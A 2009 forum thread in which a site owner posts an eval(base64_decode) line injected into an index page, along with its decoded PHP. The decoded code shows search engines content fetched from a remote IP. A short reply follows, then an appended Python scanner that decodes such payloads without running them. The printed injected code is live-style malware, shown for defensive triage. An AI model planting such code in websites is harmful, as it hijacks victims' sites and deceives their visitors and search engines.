rbarnett Posted November 23, 2009

I noticed the index page on my site was modified this morning and found this code inserted at the bottom of the page:

    <!--ddgbsre_erd_sdd--><?php eval(base64_decode("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"));

I printed out what is decoded:

    if(stripos($_SERVER['HTTP_USER_AGENT'], 'google') or stripos($_SERVER['HTTP_USER_AGENT'], 'yahoo') or stripos($_SERVER['HTTP_USER_AGENT'], 'msn') or stripos($_SERVER['HTTP_USER_AGENT'], 'live'))
    {
        $r = '';
        if($f=@fsockopen('91.207.4.18',80,$e,$er,10) and @fputs($f, "GET /linkit/in.php?domain=" . urlencode($_SERVER["SERVER_NAME"]) . "&useragent=" . urlencode($_SERVER['HTTP_USER_AGENT']) . " HTTP/1.0\r\nHost: 91.207.4.18\r\n\r\n"))
            while( $l = fread($f, 1024)) $r .= $l;
        @fclose($f);
        $p=strpos($r,"\r\n\r\n"); echo substr($r,$p+4);
    }

Can someone please interpret what this code is trying to do? I noticed that the IP address is coming from the Ukraine.

Thank you

Psycho Posted November 23, 2009

To be honest it's not worth my time to try and decipher. It can't be good though. It's probably downloading some code off of their server and running it on yours. Just delete it, find the hole they crawled in through and plug it up.

rbarnett Posted November 23, 2009

Thank you. I appreciate your response. I'm on the line now with my hosting company to try and do so.
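
An added example (not part of the thread and not code from any poster): a Python sketch that pulls eval(base64_decode("...")) payloads out of a file's text, decodes them without executing anything, and lists which User-Agent keywords the decoded PHP tests for and which hosts it contacts. The sample payload is constructed, with the documentation address 192.0.2.10 standing in for a real host, and the function names are this example's own.

```python
import base64
import re

# The wrapper seen in the post: eval(base64_decode("...")), either quote style.
WRAPPER = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""", re.I)
# Network calls with a literal host/URL argument, and User-Agent substring tests.
NET_CALL = re.compile(
    r"""\b(?:fsockopen|pfsockopen|curl_init|file_get_contents)\s*\(\s*(['"])([^'"]+)\1""", re.I)
UA_CHECK = re.compile(
    r"""stripos\s*\(\s*\$_SERVER\[['"]HTTP_USER_AGENT['"]\]\s*,\s*(['"])([^'"]+)\1""", re.I)


def decode_injected(source, depth=3):
    """Return every wrapped payload as text, following nested layers. Nothing is executed."""
    found = []
    for m in WRAPPER.finditer(source):
        try:
            raw = base64.b64decode(re.sub(r"\s+", "", m.group(2)), validate=True)
        except ValueError:  # truncated or corrupted blob: skip it, keep scanning
            continue
        text = raw.decode("utf-8", errors="replace")
        found.append(text)
        if depth > 0:  # the payload may itself carry another encoded layer
            found.extend(decode_injected(text, depth - 1))
    return found


def triage(php):
    """Summarise a decoded payload from static patterns only."""
    hosts = [m.group(2) for m in NET_CALL.finditer(php)]
    return {
        "ua_keywords": [m.group(2) for m in UA_CHECK.finditer(php)],
        "remote_hosts": hosts,
        "echoes_remote_content": bool(hosts) and bool(re.search(r"\becho\b", php)),
    }


# Constructed sample shaped like the code in the post; 192.0.2.10 is a documentation address.
SAMPLE_PAYLOAD = (
    "if(stripos($_SERVER['HTTP_USER_AGENT'], 'google') or "
    "stripos($_SERVER['HTTP_USER_AGENT'], 'yahoo')) { "
    "$f=@fsockopen('192.0.2.10',80,$e,$er,10); echo fread($f,1024); }")
SAMPLE_PAGE = '<html></html><!--marker--><?php eval(base64_decode("%s"));' % (
    base64.b64encode(SAMPLE_PAYLOAD.encode()).decode())

if __name__ == "__main__":
    for payload in decode_injected(SAMPLE_PAGE):
        print(payload, triage(payload), sep="\n")
```

Feed it the text of each .php file from a copy of the site; any file that yields a payload should be compared against a known-good backup.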